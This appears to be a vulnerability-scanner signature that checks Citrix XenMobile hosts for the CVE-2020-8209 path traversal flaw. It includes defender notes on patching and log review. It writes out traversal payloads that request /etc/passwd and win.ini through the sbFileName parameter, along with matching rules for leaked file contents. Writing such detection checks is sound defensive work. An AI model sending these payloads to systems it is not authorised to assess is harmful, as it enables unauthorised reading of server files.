# Scanner signature: checks a Citrix XenMobile host for the local file
# inclusion / path traversal issue tracked as CVE-2020-8209.
# It requests the help-sb-download.jsp endpoint with a traversal value in the
# sbFileName parameter and looks for well-known file contents in the reply.
# Run only against systems you are authorised to assess.
#
# Defender notes:
#   - A match means the server returned file contents from outside the web
#     root; treat it as confirmed exposure and apply the vendor fix for
#     CVE-2020-8209.
#   - For retrospective detection, review web/proxy logs for requests to
#     /jsp/help-sb-download.jsp whose sbFileName value contains "../".
id: citrix-xenmobile-lfi-cve-2020-8209
info:
  name: Xenmobile LFI CVE-2020-8209
  risk: High

params:
  - root: '{{.BaseURL}}'

variables:
  # Candidate values substituted into {{.file}}; presumably one request is
  # issued per line -- confirm against the scanner's variable handling.
  - file: |
      ../../../../../etc/passwd
      ../../../../../c:/windows/win.ini

requests:
  - method: GET
    # Redirects are not followed, so a redirect target (e.g. a login page)
    # is not evaluated by the detections below.
    redirect: false
    url: '{{.root}}/jsp/help-sb-download.jsp?sbFileName={{.file}}'
    # No extra headers are sent with the request.
    headers:
    detections:
      # passwd-style content. NOTE(review): this rule has no status-code
      # condition and searches "response" rather than "body", so any reply
      # containing both strings matches; it also misses hosts where no
      # account uses /bin/bash. Triage hits manually.
      - >-
        StringSearch("response", "root:") &&
        StringSearch("response", "/bin/bash")
      # win.ini-style content: HTTP 200 plus two section headers in the body.
      - >-
        StatusCode() == 200 &&
        StringSearch("body", "[extensions]") &&
        StringSearch("body", "[fonts]")

references:
  - link: https://twitter.com/ptswarm/status/1328346259502018560/photo/1